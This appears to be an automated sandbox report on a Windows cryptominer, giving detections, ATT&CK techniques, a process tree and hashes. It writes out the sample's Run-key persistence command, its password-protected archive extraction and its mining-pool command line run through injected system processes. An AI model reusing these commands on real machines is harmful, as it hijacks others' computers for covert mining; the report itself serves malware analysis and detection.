f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4

Analysis

max time kernel
150s
max time network
132s
platform
windows10_x64
resource
win10-en-20211104
submitted
01-12-2021 20:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe
Size

119KB
MD5

015aae43b84cef99e63a6a518ce5ac14
SHA1

64500abb668d2844d2ca239ab80f6a98478af60d
SHA256

f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4
SHA512

133408c310ac19c29168c30b28fe96427e7a4d69fddb4de31c27430af05e318098e6fcb1fd6ca34efabdd7ba70d85acff93cac9351fd82a6a84f651274fb5faa

Score

9^/10

evasion persistence themida upx

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

7z.exe7z.exeRegHost.exe7z.exe7z.exe

pid process

1732 7z.exe
1436 7z.exe
2292 RegHost.exe
3640 7z.exe
2212 7z.exe

pid	process
1732	7z.exe
1436	7z.exe
2292	RegHost.exe
3640	7z.exe
2212	7z.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe	upx

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

bfsvc.exeexplorer.exebfsvc.exeexplorer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bfsvc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bfsvc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bfsvc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bfsvc.exe

Loads dropped DLL 4 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe

pid process

1732 7z.exe
1436 7z.exe
3640 7z.exe
2212 7z.exe

pid	process
1732	7z.exe
1436	7z.exe
3640	7z.exe
2212	7z.exe

Themida packer 18 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe	themida
behavioral1/memory/1124-135-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1124-141-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1124-144-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1124-145-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1124-146-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1124-148-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1124-150-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1124-151-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/1124-152-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe	themida
behavioral1/memory/3852-194-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/3852-195-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/3852-197-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/3852-198-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/3852-200-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/3852-201-0x0000000140000000-0x00000001402AD000-memory.dmp	themida
behavioral1/memory/3852-203-0x0000000140000000-0x00000001402AD000-memory.dmp	themida

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\RegHost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\RegHost.exe -FromAutoRun"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

bfsvc.exe

pid process

1320 bfsvc.exe
1320 bfsvc.exe

pid	process
1320	bfsvc.exe
1320	bfsvc.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exeRegHost.exe

description	pid	process	target process
PID 2436 set thread context of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 set thread context of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2292 set thread context of 2676	2292	RegHost.exe	bfsvc.exe
PID 2292 set thread context of 3852	2292	RegHost.exe	explorer.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

explorer.exe

pid	process
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe
1124	explorer.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe

description	pid	process
Token: SeRestorePrivilege	1732	7z.exe
Token: 35	1732	7z.exe
Token: SeSecurityPrivilege	1732	7z.exe
Token: SeSecurityPrivilege	1732	7z.exe
Token: SeRestorePrivilege	1436	7z.exe
Token: 35	1436	7z.exe
Token: SeSecurityPrivilege	1436	7z.exe
Token: SeSecurityPrivilege	1436	7z.exe
Token: SeRestorePrivilege	3640	7z.exe
Token: 35	3640	7z.exe
Token: SeSecurityPrivilege	3640	7z.exe
Token: SeSecurityPrivilege	3640	7z.exe
Token: SeRestorePrivilege	2212	7z.exe
Token: 35	2212	7z.exe
Token: SeSecurityPrivilege	2212	7z.exe
Token: SeSecurityPrivilege	2212	7z.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2436 wrote to memory of 2712	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	cmd.exe
PID 2436 wrote to memory of 2712	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	cmd.exe
PID 2712 wrote to memory of 2640	2712	cmd.exe	reg.exe
PID 2712 wrote to memory of 2640	2712	cmd.exe	reg.exe
PID 2436 wrote to memory of 1600	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	cmd.exe
PID 2436 wrote to memory of 1600	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	cmd.exe
PID 1600 wrote to memory of 1732	1600	cmd.exe	7z.exe
PID 1600 wrote to memory of 1732	1600	cmd.exe	7z.exe
PID 2436 wrote to memory of 2868	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	cmd.exe
PID 2436 wrote to memory of 2868	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	cmd.exe
PID 2868 wrote to memory of 1436	2868	cmd.exe	7z.exe
PID 2868 wrote to memory of 1436	2868	cmd.exe	7z.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1320	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	bfsvc.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe
PID 2436 wrote to memory of 1124	2436	f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe
"C:\Users\Admin\AppData\Local\Temp\f7ac9f1d654571249f850f8b7cf437d4f5e339350bb56ef4808dc0ca13b78ea4.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
2⤵
- Suspicious use of WriteProcessMemory
PID:2712

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
3⤵
- Adds Run key to start application
PID:2640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
2⤵
- Suspicious use of WriteProcessMemory
PID:1600

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
2⤵
- Suspicious use of WriteProcessMemory
PID:2868

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -pool etc.2miners.com:1010 -wal 0xb6a83eeeb736661D6B7Bf125926557817a76DA80 -coin etc -worker @EasyMiner_Bot
2⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1320

C:\Windows\explorer.exe
C:\Windows\bfsvc.exe -log 0 -pool etc.2miners.com:1010 -wal 0xb6a83eeeb736661D6B7Bf125926557817a76DA80 -coin etc -worker @EasyMiner_Bot
2⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1124

C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
4⤵
PID:2996

C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
5⤵
- Adds Run key to start application
PID:3372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
4⤵
PID:3156

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
4⤵
PID:3988

C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2212

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -log 0 -pool etc.2miners.com:1010 -wal 0xb6a83eeeb736661D6B7Bf125926557817a76DA80 -coin etc -worker @EasyMiner_Bot
4⤵
- Checks BIOS information in registry
PID:2676

C:\Windows\explorer.exe
C:\Windows\bfsvc.exe -log 0 -pool etc.2miners.com:1010 -wal 0xb6a83eeeb736661D6B7Bf125926557817a76DA80 -coin etc -worker @EasyMiner_Bot
4⤵
- Checks BIOS information in registry
PID:3852

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1E698CCB2C296D265AC1A253974E09FD_C447A28B4DC096971A664434C4B2EE77
MD5
7e10da484c727bb7b7ba2bea5ac86f26

SHA1
a07b8b38ea6be3cae412fc1ce0a407cf07ac1caf

SHA256
d064d0c6af50a1c9b80770557dc84cf5d100d3d5ae906d1b0a75b2649f0de858

SHA512
82e976f19c88dbc715a91321cd04d508971f1ca09bc3f38a29e738585dded4cc50f2f51de06ee41ef1b9337d35ddae2e49defb5d024c00f4b0a94e7306561362

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_EE9DB89C3D6A328B5FEAFF0ED3C77874
MD5
ddfd399f22add6e93904948534dcf7c1

SHA1
ed8e196773d3805cb81d3546f5dda3bff0375588

SHA256
88c3fabde827b38e42bc05e75e5652c6f237b3a78f9b1656e369587bd8ba2cd0

SHA512
059c04698f35e9661bb12706f4eb2e5522d77704c660b6e677331ee7bae0b9ea1b81a5dcea9bb576b155099a261d760e4fd0db73b0f2bbd5e4c170c5bdedfdca

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619
MD5
b1cb6cea807cacfa42804b7fe8b1a42c

SHA1
8a9f7853be61ffbf0ac9a95c7e5338f3b762e86d

SHA256
aef2f9754c154e8294b64bd3da9911fe66180ce55d86c6e8c7310748de114850

SHA512
2c17f2aadb5a7d78e197c99f99718d6e04e37b4908953becce4abe570104acc923f127c12136e3e135fa90555ce29644b23bc2daa9acfdc63e80557ede9550e6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1E698CCB2C296D265AC1A253974E09FD_C447A28B4DC096971A664434C4B2EE77
MD5
b1df5e2d1efa4cd8e583d28ac6cbe2b2

SHA1
db24b169ffd9b7197876790d31bcdfac93bb386f

SHA256
eafc3ebffec57cb44535cbfe854b2d7538a4f0000931172750f560f989b5438c

SHA512
2a80188ea3428a8b40fb31e6e0c440e8bfb37092c11bd7f4ec4e6d7b8e29996c7d6988f900435e4ec2c452561649301f89238b1b54a24409ae54037f0efd3f39

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_EE9DB89C3D6A328B5FEAFF0ED3C77874
MD5
7fbf3bfb9cc557e2307757e5d7e4e128

SHA1
51a457b8b664ba9d495f78c3f0057528cfeb4302

SHA256
9ea40c826d067d3149e0c544e56ded9a527cad8a1eb0b3ae73e77558c58dda52

SHA512
379f0307fc453a1cd7a6be733cef99d3318057dd1d92caf7df5f643c76e26f4c2af7cc16665315eb7496d0efd1ca40ec07c5d5e4a668e5af4b1e9439bbe863bf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619
MD5
d1d059f22d531ac942e364d4f2d04eb5

SHA1
0245a291f15a18fec9dbbe12f3cb56f197ce3c9d

SHA256
de8968619a2d91ab75e0f7ed0ad88c2f04105897d9df48962fd8ac3092c6a980

SHA512
f5b8f395331d4a9ad08dca85b3b9e45762c52f710c177e2cebb99c7786ddb5b13cd3734fa9eb60be2e01abf3c03acf07aeae0a86eb6602a387e3f03cf7da802a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0JDXA5XR\7z[1].dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8YCK9U05\7z[1].exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
4f7fdcf3abc0169b591e502842be074a5188c2c9

SHA256
4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

SHA512
2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
MD5
86e8388e83be8909d148518cf7b6e083

SHA1
